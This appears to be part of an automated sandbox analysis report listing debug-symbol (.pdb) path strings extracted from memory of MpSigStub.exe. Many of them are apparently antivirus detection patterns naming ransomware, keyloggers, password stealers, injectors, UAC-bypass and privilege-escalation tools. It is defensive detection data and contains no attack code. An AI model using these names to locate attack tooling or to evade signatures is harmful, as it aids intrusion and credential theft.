Source: Binary string: \x64\release\shell.pdb source: MpSigStub.exe, 00000023.00000003.18424133495.0000015B1C0F0000.00000004.00000001.sdmp
Source: Binary string: hWEHW#@HJERKJERJER^$.Pdb~ source: MpSigStub.exe, 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: mgr.pdb source: MpSigStub.exe, 00000023.00000003.18324547737.0000015B1B0B1000.00000004.00000001.sdmp
Source: Binary string: bot.pdb source: MpSigStub.exe, 00000023.00000003.18424133495.0000015B1C0F0000.00000004.00000001.sdmp
Source: Binary string: b-- b3: bs: bue b1f bss b5+(b---b51-b74-bd6-bf8-bbf-ban-bot-bne.bog.bck.bpk.b*m.bup.b.s.but.be /be10b420b180bc01bd31bb91b2c1b-b2b6f2b443b683b7-4bd-4by24b994b8a4b,c4b0c4b{65bd85b-95bfa5bgg5b5j5bd96b2c6bhv6be-7b207bf27b-47b077be87b1a7b4f7b528bi38b478b-88b5-9b7f9b3n9but:bg,?bhi_btn_bio_bro_bbs_bet_b: ab86abs_ab-aab5babgbab.cabadabrdabffabciabgrab[tabstab{tabiuab.wab/wab1-bbc-bb59bb89bbjabbffbbtgbb#jbbcobbcsbbbubb26cba8cb4bcb6ecb4fcbyhcbdmcbcpcbipcb-tcb*.db</dbe0db27dbpadbbbdbccdb\ddbbddb6edbmodboodb.pdbrrdb-4ebhbeb\debhgebehebtiebklebulebomebjoeb.rebirebprebosebrvebrwebmzeb source: MpSigStub.exe, 00000023.00000003.18305343223.0000015B1C4E5000.00000004.00000001.sdmp
Source: Binary string: \\UniversalOrchestratorPrivEscPoc\\Release\\UniversalOrchestratorPrivEscPoc\.pdb source: MpSigStub.exe, 00000023.00000003.18291855169.0000015B1B8B1000.00000004.00000001.sdmp
Source: Binary string: .+:.*\\SkypeSpread.pdb source: MpSigStub.exe, 00000023.00000003.18293045113.0000015B1BC4D000.00000004.00000001.sdmp
Source: Binary string: \Dolphin.pdb source: MpSigStub.exe, 00000023.00000003.18284892419.0000015B1AF67000.00000004.00000001.sdmp
Source: Binary string: comp.pdbd source: MpSigStub.exe, 00000023.00000003.18319632958.0000015B1BDD9000.00000004.00000001.sdmp
Source: Binary string: acpi.pdb source: MpSigStub.exe, 00000023.00000003.18307753022.0000015B1B767000.00000004.00000001.sdmp
Source: Binary string: 'C:\postmaster\merge\Peasants\Billy.pdb] source: MpSigStub.exe, 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp
Source: Binary string: c:\Documents and Settings\Administrator\My Documents\Visual Studio Projects\EASZZCDFR\Release\EASZZCDFR.pdb source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdbx source: MpSigStub.exe, 00000023.00000003.18293334552.0000015B1BC8E000.00000004.00000001.sdmp
Source: Binary string: -C:\backward\inch\enumeration\Atmel\neces.pdb source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp
Source: Binary string: KF.+:\\Projects\\Crypt\\Stub2005\\Stub2005\\Stub\\Stub\\Release\\.*.pdb source: MpSigStub.exe, 00000023.00000003.18427196191.0000015B1AB46000.00000004.00000001.sdmp
Source: Binary string: Ivan\Documents\generic_exe\Release\BHO.pdb source: MpSigStub.exe, 00000023.00000003.18297596094.0000015B1B44F000.00000004.00000001.sdmp
Source: Binary string: \CCC\obj\Debug\CCC.pdb source: MpSigStub.exe, 00000023.00000003.18316847212.0000015B1B582000.00000004.00000001.sdmp
Source: Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\ncpa\objfre\i386\ncpa.pdb source: MpSigStub.exe, 00000023.00000003.18313187984.0000015B1B305000.00000004.00000001.sdmp
Source: Binary string: WhjrkehLkpe;rltjhpow;elkrjjklWEKL#.pdb] source: MpSigStub.exe, 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: EC:\Projects\Docwize\cUniFunctions\obj\DocwizeClient\cUniFunctions.pdbx source: MpSigStub.exe, 00000023.00000003.18291256000.0000015B1B9B9000.00000004.00000001.sdmp
Source: Binary string: .+:\\src\\tcrypt\\Release\\s_(high|low).pdb source: MpSigStub.exe, 00000023.00000003.18286213062.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-io-l1-1-0.pdb source: MpSigStub.exe, 00000023.00000003.18297596094.0000015B1B44F000.00000004.00000001.sdmp
Source: Binary string: CryptoService.pdb source: MpSigStub.exe, 00000023.00000003.18433124639.0000015B1B6E2000.00000004.00000001.sdmp
Source: Binary string: WanNengWB\WBUpd32.pdb source: MpSigStub.exe, 00000023.00000003.18319632958.0000015B1BDD9000.00000004.00000001.sdmp
Source: Binary string: msasn1.pdb source: MpSigStub.exe, 00000023.00000003.18291256000.0000015B1B9B9000.00000004.00000001.sdmp
Source: Binary string: ,\NetGuy_Explorer\Release\NetGuy_Explorer.pdb source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp
Source: Binary string: Asource\repos\Coronavirus1\Coronavirus1\obj\Debug\Coronavirus1.pdb] source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp
Source: Binary string: \TMain\Release\TSvr.pdb source: MpSigStub.exe, 00000023.00000003.18349339011.0000015B1A999000.00000004.00000001.sdmp
Source: Binary string: 6\Desktop\EK\Source\Rina_AC\Rina_AC\Release\Rina_AC.pdb source: MpSigStub.exe, 00000023.00000003.18307753022.0000015B1B767000.00000004.00000001.sdmp
Source: Binary string: ,T:\TFS-TradeProject\PDB\Release\TT-Miner.pdb source: MpSigStub.exe, 00000023.00000003.18286213062.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: L%D:\\MyCode\\riot.?\\encryptor.+\.pdb source: MpSigStub.exe, 00000023.00000003.18296662261.0000015B1C292000.00000004.00000001.sdmp
Source: Binary string: \SearchProtect\bin\Release\HPNotify.pdb source: MpSigStub.exe, 00000023.00000003.18349339011.0000015B1A999000.00000004.00000001.sdmp
Source: Binary string: Bou3asba\obj\Release\Danao.pdb source: MpSigStub.exe, 00000023.00000003.18304719860.0000015B1B7EB000.00000004.00000001.sdmp
Source: Binary string: c:\RPCInstall\Release\RPCInstall.pdb source: MpSigStub.exe, 00000023.00000003.18315106599.0000015B1B858000.00000004.00000001.sdmp
Source: Binary string: Release DlpHook\Proxy.pdb source: MpSigStub.exe, 00000023.00000003.18286213062.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: $\SuperLight\release\MfcDllServer.pdba source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp
Source: Binary string: $\Season\Wife_low\531\Quart\table.pdb source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp
Source: Binary string: \Sample\Release\CNetworking.pdb source: MpSigStub.exe, 00000023.00000003.18428517155.0000015B1C06B000.00000004.00000001.sdmp
Source: Binary string: \BypassUac\branches\Download\build\Release\service.pdb source: MpSigStub.exe, 00000023.00000003.18290355074.0000015B1AEB4000.00000004.00000001.sdmp
Source: Binary string: MC:\Users\wizzlabs\source\repos\ConsoleMap\ConsoleMap\obj\Release\Ehssassi.pdb source: MpSigStub.exe, 00000023.00000003.18286213062.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: 2Projects\VerifyAndLaunch\release\GCO Bootstrap.pdb source: MpSigStub.exe, 00000023.00000003.18327831413.0000015B1A891000.00000004.00000001.sdmp
Source: Binary string: OC:\Users\hoogle168\Desktop\2008Projects\NewCoreCtrl08\Release\NewCoreCtrl08.pdb source: MpSigStub.exe, 00000023.00000003.18424133495.0000015B1C0F0000.00000004.00000001.sdmp
Source: Binary string: \mywscript.pdb source: MpSigStub.exe, 00000023.00000003.18433465792.0000015B1B723000.00000004.00000001.sdmp
Source: Binary string: \CRP\Release\Mount.pdbaD source: MpSigStub.exe, 00000023.00000003.18338690411.0000015B1A7CB000.00000004.00000001.sdmp
Source: Binary string: :Release\haozip.chs\bin\Win32\release\pdb\HaoZip7zSetup.pdb source: MpSigStub.exe, 00000023.00000003.18327176542.0000015B1B61C000.00000004.00000001.sdmp
Source: Binary string: \Release\MyEncrypter2.pdb source: MpSigStub.exe, 00000023.00000003.18432465628.0000015B1B9FA000.00000004.00000001.sdmp
Source: Binary string: 7h4qMQ1edvEOY+wQIOdVR_v.pdb source: MpSigStub.exe, 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: c:\dev\torntv\Release\TornTVApp.pdb source: MpSigStub.exe, 00000023.00000003.18317322207.0000015B1B5DB000.00000004.00000001.sdmp
Source: Binary string: winlogon.PDB source: MpSigStub.exe, 00000023.00000003.18314163408.0000015B1BB45000.00000004.00000001.sdmp
Source: Binary string: K8MiniPage.pdbx source: MpSigStub.exe, 00000023.00000003.18322610510.0000015B1A546000.00000004.00000001.sdmp
Source: Binary string: \RUNPCH\Release\GUO_CAU.pdb source: MpSigStub.exe, 00000023.00000003.18298177384.0000015B1AD15000.00000004.00000001.sdmp
Source: Binary string: 0.pdb source: MpSigStub.exe, 00000023.00000003.18329340155.0000015B1AC0C000.00000004.00000001.sdmp
Source: Binary string: \bundler\Production\bundler.pdb source: MpSigStub.exe, 00000023.00000003.18297596094.0000015B1B44F000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-shlwapi-obsolete-l1-1-0.pdb source: MpSigStub.exe, 00000023.00000003.18282376211.0000015B1C133000.00000004.00000001.sdmp
Source: Binary string: D:\C++\AsusShellCode\Release\AsusShellCode.pdb source: MpSigStub.exe, 00000023.00000003.18330938423.0000015B1AA81000.00000004.00000001.sdmp
Source: Binary string: advapi32.pdbx source: MpSigStub.exe, 00000023.00000003.18290355074.0000015B1AEB4000.00000004.00000001.sdmp
Source: Binary string: costura.injectordll.pdb source: MpSigStub.exe, 00000023.00000003.18428517155.0000015B1C06B000.00000004.00000001.sdmp
Source: Binary string: )\CVE-2019-0803201992\Release\poc_test.pdb source: MpSigStub.exe, 00000023.00000003.18307753022.0000015B1B767000.00000004.00000001.sdmp
Source: Binary string: cleanmgr.pdbPE source: MpSigStub.exe, 00000023.00000003.18303445859.0000015B1B86F000.00000004.00000001.sdmp
Source: Binary string: [H:\My Data\My Source Code\Microsoft Office 2010\AutoKMS\AutoKMS\obj\x86\Release\AutoKMS.pdb source: MpSigStub.exe, 00000023.00000003.18335134155.0000015B1A914000.00000004.00000001.sdmp
Source: Binary string: mpengine.pdbOGPS source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp
Source: Binary string: A .+\\WormWin32 Poenon.+\\.+.pdb source: MpSigStub.exe, 00000023.00000003.18329049691.0000015B1ABCB000.00000004.00000001.sdmp
Source: Binary string: f:\project_2008\Fileman_candle_kgrid\Filebus\Bin\UpdateWindow.pdb source: MpSigStub.exe, 00000023.00000003.18314518681.0000015B1B7A8000.00000004.00000001.sdmp
Source: Binary string: wRHWRH@4hjethwehgw.pdb source: MpSigStub.exe, 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp
Source: Binary string: sfix\Release\sfix.pdb source: MpSigStub.exe, 00000023.00000003.18434111043.0000015B1AF23000.00000004.00000001.sdmp
Source: Binary string: unknowndll.pdba~ source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp
Source: Binary string: \fiDarSayebni.pdb source: MpSigStub.exe, 00000023.00000003.18287888120.0000015B1BC0A000.00000004.00000001.sdmp
Source: Binary string: \[Release.Win32]Clicker.pdb source: MpSigStub.exe, 00000023.00000003.18426294063.0000015B1BD11000.00000004.00000001.sdmp
Source: Binary string: IperiusRDPClient.pdb source: MpSigStub.exe, 00000023.00000003.18319967809.0000015B1BE5C000.00000004.00000001.sdmp
Source: Binary string: %KMS Client\bin\Release\KMS Client.pdba} source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp
Source: Binary string: hmld1\Release\hmld1.pdb source: MpSigStub.exe, 00000023.00000003.18434111043.0000015B1AF23000.00000004.00000001.sdmp
Source: Binary string: S\ccnet\Publish_Client\work\src\mainapp\Abacus.LaunchMail\bin\Release\LaunchMail.pdb source: MpSigStub.exe, 00000023.00000003.18314163408.0000015B1BB45000.00000004.00000001.sdmp
Source: Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\attrib\objfre\i386\attrib.pdbP& source: MpSigStub.exe, 00000023.00000003.18293334552.0000015B1BC8E000.00000004.00000001.sdmp
Source: Binary string: wajam_goblin.pdb source: MpSigStub.exe, 00000023.00000003.18340752801.0000015B1B72C000.00000004.00000001.sdmp
Source: Binary string: C:\SuccWare\SuccWare\obj\Debug\SuccWare.pdb source: MpSigStub.exe, 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp
Source: Binary string: \\qbot_debugger\\.+\\qbot_debugger\.pdb source: MpSigStub.exe, 00000023.00000003.18296662261.0000015B1C292000.00000004.00000001.sdmp
Source: Binary string: d:\av\common_main.obj.x86chk\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\twunk_16\objchk\i386\twunk_16.pdb source: MpSigStub.exe, 00000023.00000003.18334190857.0000015B1A60C000.00000004.00000001.sdmp
Source: Binary string: MsiDatabaseMerge.pdb source: MpSigStub.exe, 00000023.00000003.18345035369.0000015B1B176000.00000004.00000001.sdmp
Source: Binary string: joy.pdb source: MpSigStub.exe, 00000023.00000003.18298177384.0000015B1AD15000.00000004.00000001.sdmp
Source: Binary string: WebBrowserPassView.pdb source: MpSigStub.exe, 00000023.00000003.18289945062.0000015B1AE5F000.00000004.00000001.sdmp
Source: Binary string: msimg32.pdb source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp
Source: Binary string: E:\Work\SaveVid\Savevid-WS-Trunk\InstallCore\rbin\soffer.pdb source: MpSigStub.exe, 00000023.00000003.18301552816.0000015B1B9FA000.00000004.00000001.sdmp
Source: Binary string: GCWYq1g.pdb source: MpSigStub.exe, 00000023.00000003.18431805767.0000015B1BFA6000.00000004.00000001.sdmp
Source: Binary string: *.pdb.|!%WINDIR%\Microsoft.NET\mscorsvw.exe source: MpSigStub.exe, 00000023.00000003.18303445859.0000015B1B86F000.00000004.00000001.sdmp
Source: Binary string: mfcsubs.pdb source: MpSigStub.exe, 00000023.00000003.18331238413.0000015B1AAC2000.00000004.00000001.sdmp
Source: Binary string: Release\NtdsAudit.pdb source: MpSigStub.exe, 00000023.00000003.18314163408.0000015B1BB45000.00000004.00000001.sdmp
Source: Binary string: netsh.pdbj source: MpSigStub.exe, 00000023.00000003.18314163408.0000015B1BB45000.00000004.00000001.sdmp
Source: Binary string: BTR.pdbGCTL source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp
Source: Binary string: mshta.pdb source: MpSigStub.exe, 00000023.00000003.18333278800.0000015B1AC5E000.00000004.00000001.sdmp
Source: Binary string: PROZIPPER.pdb source: MpSigStub.exe, 00000023.00000003.18318994950.0000015B1A589000.00000004.00000001.sdmp
Source: Binary string: sfxrar32\Release\sfxrar.pdbxB source: MpSigStub.exe, 00000023.00000003.18291855169.0000015B1B8B1000.00000004.00000001.sdmp
Source: Binary string: \\win\\build\\src\\build\\Release\\chrome_frame_helper\.exe\.pdb source: MpSigStub.exe, 00000023.00000003.18291855169.0000015B1B8B1000.00000004.00000001.sdmp
Source: Binary string: ddraw.pdb source: MpSigStub.exe, 00000023.00000003.18282376211.0000015B1C133000.00000004.00000001.sdmp
Source: Binary string: GPDFDocument.pdb source: MpSigStub.exe, 00000023.00000003.18323230598.0000015B1B134000.00000004.00000001.sdmp
Source: Binary string: *\ClientPlugin\obj\Release\ClientPlugin.pdb source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp
Source: Binary string: wbadmin.pdb source: MpSigStub.exe, 00000023.00000003.18343611807.0000015B1BD13000.00000004.00000001.sdmp
Source: Binary string: Unite.pdb source: MpSigStub.exe, 00000023.00000003.18319967809.0000015B1BE5C000.00000004.00000001.sdmp
Source: Binary string: \Release\WCmouiTri.pdb] source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp
Source: Binary string: \MailClient\Release\MailClient.pdb source: MpSigStub.exe, 00000023.00000003.18329672768.0000015B1ADDA000.00000004.00000001.sdmp
Source: Binary string: L%D:\\MyCode\\riot.?\\decryptor.+\.pdb source: MpSigStub.exe, 00000023.00000003.18296662261.0000015B1C292000.00000004.00000001.sdmp
Source: Binary string: :FreeDownloadmanager\obj\x86\Debug\FreeDownloadManager.pdbx source: MpSigStub.exe, 00000023.00000003.18329340155.0000015B1AC0C000.00000004.00000001.sdmp
Source: Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\w32tm\objfre\i386\w32tm.pdb source: MpSigStub.exe, 00000023.00000003.18313512818.0000015B1B346000.00000004.00000001.sdmp
Source: Binary string: Flipopia.pdb source: MpSigStub.exe, 00000023.00000003.18314518681.0000015B1B7A8000.00000004.00000001.sdmp
Source: Binary string: \Ozrenko\Documents\Work\Interstat2\Interstat2\Weather\Interstat.pdb source: MpSigStub.exe, 00000023.00000003.18350085117.0000015B1B6E3000.00000004.00000001.sdmp
Source: Binary string: nethtsrv.pdb source: MpSigStub.exe, 00000023.00000003.18288248948.0000015B1B1FB000.00000004.00000001.sdmp
Source: Binary string: Users\Legion\source\repos\curl\Release\curl.pdb source: MpSigStub.exe, 00000023.00000003.18433465792.0000015B1B723000.00000004.00000001.sdmp
Source: Binary string: Downloads\notepad-master\Release\notepad.pdb source: MpSigStub.exe, 00000023.00000003.18329340155.0000015B1AC0C000.00000004.00000001.sdmp
Source: Binary string: \Black Coding\RAT+BOT\WebServer 2.0\src\Release\WebServer.pdb source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp
Source: Binary string: AdFind\Release\AdFind.pdb source: MpSigStub.exe, 00000023.00000003.18286213062.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: d:\young\swprojects\tdxin\bin\amd64\rtdxftex_amd64.pdb source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp
Source: Binary string: S*\\server\\V.*\\Release\\PhantomNet.*\.pdb source: MpSigStub.exe, 00000023.00000003.18286213062.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: \PCHunter64.pdb source: MpSigStub.exe, 00000023.00000003.18293662919.0000015B1BCD0000.00000004.00000001.sdmp
Source: Binary string: Release\toolbar_setup.pdb source: MpSigStub.exe, 00000023.00000003.18314163408.0000015B1BB45000.00000004.00000001.sdmp
Source: Binary string: \x64\Release\Narrator.pdb source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp
Source: Binary string: rasautou.pdb source: MpSigStub.exe, 00000023.00000003.18290582002.0000015B1BF65000.00000004.00000001.sdmp
Source: Binary string: \obj\Release\PersistenceModule.pdb source: MpSigStub.exe, 00000023.00000003.18317322207.0000015B1B5DB000.00000004.00000001.sdmp
Source: Binary string: ?ExtractedBundle\RTM_ImageModRec_1.1.5.0_x64\RTM_ImageModRec.pdbac source: MpSigStub.exe, 00000023.00000003.18313187984.0000015B1B305000.00000004.00000001.sdmp
Source: Binary string: ?E:\hhu\TeamViewer_13.bjbj\BuildTarget\Release2017\tv_w32dll.pdb source: MpSigStub.exe, 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp
Source: Binary string: \i386\lanmandrv.pdb source: MpSigStub.exe, 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: c:\divide\broad\Hole\DoThird.pdb source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp
Source: Binary string: \Release\corsar.pdb source: MpSigStub.exe, 00000023.00000003.18333278800.0000015B1AC5E000.00000004.00000001.sdmp
Source: Binary string: e:\updatecheck\UpdateCheck\release\UpdateCheck.pdb source: MpSigStub.exe, 00000023.00000003.18282376211.0000015B1C133000.00000004.00000001.sdmp
Source: Binary string: XBundlerTlsHelper.pdb source: MpSigStub.exe, 00000023.00000003.18316847212.0000015B1B582000.00000004.00000001.sdmp
Source: Binary string: UqxIkBeNYhKR.pdb source: MpSigStub.exe, 00000023.00000003.18424133495.0000015B1C0F0000.00000004.00000001.sdmp
Source: Binary string: e:\src\fcrypt\Release\S\s_high.pdb source: MpSigStub.exe, 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp
Source: Binary string: 9D:\BuildScript.NET\c2patchdx11\pc\Build\Bin32\Crysis2.pdb source: MpSigStub.exe, 00000023.00000003.18426294063.0000015B1BD11000.00000004.00000001.sdmp
Source: Binary string: BugTrap.pdb] source: MpSigStub.exe, 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp
Source: Binary string: e:\builddata\Install\source\Min_Loader-BuildAndDeploy\Release\Loader_Resized.pdb source: MpSigStub.exe, 00000023.00000003.18314163408.0000015B1BB45000.00000004.00000001.sdmp
Source: Binary string: tdc.pdb source: MpSigStub.exe, 00000023.00000003.18298177384.0000015B1AD15000.00000004.00000001.sdmp
Source: Binary string: obj\Release\FlashPlayerApp.pdb source: MpSigStub.exe, 00000023.00000003.18292431996.0000015B1BA3D000.00000004.00000001.sdmp
Source: Binary string: mpg2splt.pdb source: MpSigStub.exe, 00000023.00000003.18283593829.0000015B1A80D000.00000004.00000001.sdmp
Source: Binary string: dxtrans.pdb source: MpSigStub.exe, 00000023.00000003.18283012261.0000015B1BB87000.00000004.00000001.sdmp
Source: Binary string: c:\supply\trouble\Classwho.pdb source: MpSigStub.exe, 00000023.00000003.18424133495.0000015B1C0F0000.00000004.00000001.sdmp
Source: Binary string: \Microsoft Windows Search.pdb source: MpSigStub.exe, 00000023.00000003.18299991338.0000015B1C3DD000.00000004.00000001.sdmp
Source: Binary string: KF.+:\\Projects\\C#\\Sayad\\Source\\Client\\bin\\x86\\Debug\\Client.pdb source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp
Source: Binary string: termsrv.pdb source: MpSigStub.exe, 00000023.00000003.18338690411.0000015B1A7CB000.00000004.00000001.sdmp
Source: Binary string: AntiMalware_Pro.pdb source: MpSigStub.exe, 00000023.00000003.18341814408.0000015B1C2D4000.00000004.00000001.sdmp
Source: Binary string: fc.pdb0 source: MpSigStub.exe, 00000023.00000003.18315964598.0000015B1A481000.00000004.00000001.sdmp
Source: Binary string: \Gleaned\purecall\win32p6.pdb source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp
Source: Binary string: Slb.EP.Shell.pdb source: MpSigStub.exe, 00000023.00000003.18333278800.0000015B1AC5E000.00000004.00000001.sdmp
Source: Binary string: 4\ValhallaCrypter\ValhallaStub\Debug\ValhallaStub.pdb source: MpSigStub.exe, 00000023.00000003.18426294063.0000015B1BD11000.00000004.00000001.sdmp
Source: Binary string: EFRE65.pdb source: MpSigStub.exe, 00000023.00000003.18322610510.0000015B1A546000.00000004.00000001.sdmp
Source: Binary string: lIFdrGkmBePss.pdb source: MpSigStub.exe, 00000023.00000003.18424133495.0000015B1C0F0000.00000004.00000001.sdmp
Source: Binary string: C>s:\\dEVELOPMdNT\\dC\+\+dCdyptordEvoldtiod_dld\\release\\m.pdb source: MpSigStub.exe, 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp
Source: Binary string: CryARr.pdb source: MpSigStub.exe, 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: !#HSTR:PossiblyClean:magottei.pdb.A source: MpSigStub.exe, 00000023.00000003.18291855169.0000015B1B8B1000.00000004.00000001.sdmp
Source: Binary string: FreeDownloadmanager\obj\x86\Debug\FreeDownloadManager.pdb source: MpSigStub.exe, 00000023.00000003.18329340155.0000015B1AC0C000.00000004.00000001.sdmp
Source: Binary string: boteg.pdbxL source: MpSigStub.exe, 00000023.00000003.18314163408.0000015B1BB45000.00000004.00000001.sdmp
Source: Binary string: KSLDriver.pdbGCTL source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp
Source: Binary string: zYAamTGB2rfW!Cp+aR.pdb source: MpSigStub.exe, 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: D:\program z visuala\keylogger\Release\keylogger.pdb source: MpSigStub.exe, 00000023.00000003.18428517155.0000015B1C06B000.00000004.00000001.sdmp
Source: Binary string: \GetWinPsw.pdb source: MpSigStub.exe, 00000023.00000003.18329672768.0000015B1ADDA000.00000004.00000001.sdmp
Source: Binary string: \\WOO\\HT\\HT Server\\.+\.pdb source: MpSigStub.exe, 00000023.00000003.18296662261.0000015B1C292000.00000004.00000001.sdmp
Source: Binary string: \bin\winfdmscheme.pdb source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp
Source: Binary string: RegAsm.pdb source: tKZVPq.exe
Source: Binary string: SAVService.pdb source: MpSigStub.exe, 00000023.00000003.18333278800.0000015B1AC5E000.00000004.00000001.sdmp
Source: Binary string: zC:\Users\EchoHackCmd\source\repos\Minecraft_DLL_Injector\Minecraft_DLL_Injector\obj\x64\Release\Minecraft_DLL_Injector.pdb source: MpSigStub.exe, 00000023.00000003.18306868118.0000015B1AA1D000.00000004.00000001.sdmp
Source: Binary string: 7laIR+|.XJ5aA0aa.pdb source: MpSigStub.exe, 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: wscript.pdb source: MpSigStub.exe, 00000023.00000003.18307753022.0000015B1B767000.00000004.00000001.sdmp
Source: Binary string: wevtutil.pdb source: MpSigStub.exe, 00000023.00000003.18306868118.0000015B1AA1D000.00000004.00000001.sdmp
Source: Binary string: \isn.pdb source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp
Source: Binary string: C:\\Users\\Lucca\\AppData\\Local\\Temp\\.*\.pdb source: MpSigStub.exe, 00000023.00000003.18307074601.0000015B1AA4C000.00000004.00000001.sdmp
Source: Binary string: \Ransomware2.0.pdb source: MpSigStub.exe, 00000023.00000003.18430467796.0000015B1AE1C000.00000004.00000001.sdmp
Source: Binary string: ToolbarCore\toolbar\ie\src\toolbar\wrapper\Release\externalwrapper.pdbx source: MpSigStub.exe, 00000023.00000003.18336414128.0000015B1BF22000.00000004.00000001.sdmp
Source: Binary string: C:\\Users\\john\\Documents\\Visual Studio 2008\\Projects\\EncryptFile.*\\.*\\EncryptFile.exe.pdb source: MpSigStub.exe, 00000023.00000003.18291855169.0000015B1B8B1000.00000004.00000001.sdmp
Source: Binary string: \DownloaderMain\DownloaderDll.pdb source: MpSigStub.exe, 00000023.00000003.18326614272.0000015B1A717000.00000004.00000001.sdmp
Source: Binary string: \rANSOM\rANSOM\obj\Sanyasteakler\rANSOM.pdb source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp
Source: Binary string: \Visual Studio 2010\Projects\installer4\installer\obj\x86\Release\installer.pdbxx source: MpSigStub.exe, 00000023.00000003.18314163408.0000015B1BB45000.00000004.00000001.sdmp
Source: Binary string: megasync.pdb source: MpSigStub.exe, 00000023.00000003.18338690411.0000015B1A7CB000.00000004.00000001.sdmp
Source: Binary string: \\wininet_fr_20200212\\.+\\?dlln\.pdb source: MpSigStub.exe, 00000023.00000003.18297885321.0000015B1B490000.00000004.00000001.sdmp
Source: Binary string: msoert2.pdb3 source: MpSigStub.exe, 00000023.00000003.18291256000.0000015B1B9B9000.00000004.00000001.sdmp
Source: Binary string: csgoInjector.pdb source: MpSigStub.exe, 00000023.00000003.18351150877.0000015B1B40C000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: MpSigStub.exe, 00000023.00000003.18291256000.0000015B1B9B9000.00000004.00000001.sdmp
Source: Binary string: \output\MinSizeRel\updrem.pdb] source: MpSigStub.exe, 00000023.00000003.18289622866.0000015B1BD96000.00000004.00000001.sdmp
Source: Binary string: vga256.pdb source: MpSigStub.exe, 00000023.00000003.18307169245.0000015B1A4C3000.00000004.00000001.sdmp
Source: Binary string: kernel32.pdb source: MpSigStub.exe, 00000023.00000003.18329979252.0000015B1AE1C000.00000004.00000001.sdmp
Source: Binary string: x:\Dev_CPP\Work\VS_KnzStr_Adware\Release\VS_Work1.pdbx source: MpSigStub.exe, 00000023.00000003.18318994950.0000015B1A589000.00000004.00000001.sdmp
Source: Binary string: \\WOO\\HT\\.+Server.+\.pdb source: MpSigStub.exe, 00000023.00000003.18329049691.0000015B1ABCB000.00000004.00000001.sdmp
Source: Binary string: acpi.pdbN source: MpSigStub.exe, 00000023.00000003.18307753022.0000015B1B767000.00000004.00000001.sdmp
Source: Binary string: Fwizzlabs\source\repos\ConsoleMap\ConsoleMap\obj\Release\FancHuible.pdb source: MpSigStub.exe, 00000023.00000003.18307753022.0000015B1B767000.00000004.00000001.sdmp
Source: Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\ncpa\objfre\i386\ncpa.pdb0 source: MpSigStub.exe, 00000023.00000003.18313187984.0000015B1B305000.00000004.00000001.sdmp
Source: Binary string: m:\VP\QM\trunk\output\Recorder.pdb source: MpSigStub.exe, 00000023.00000003.18288248948.0000015B1B1FB000.00000004.00000001.sdmp
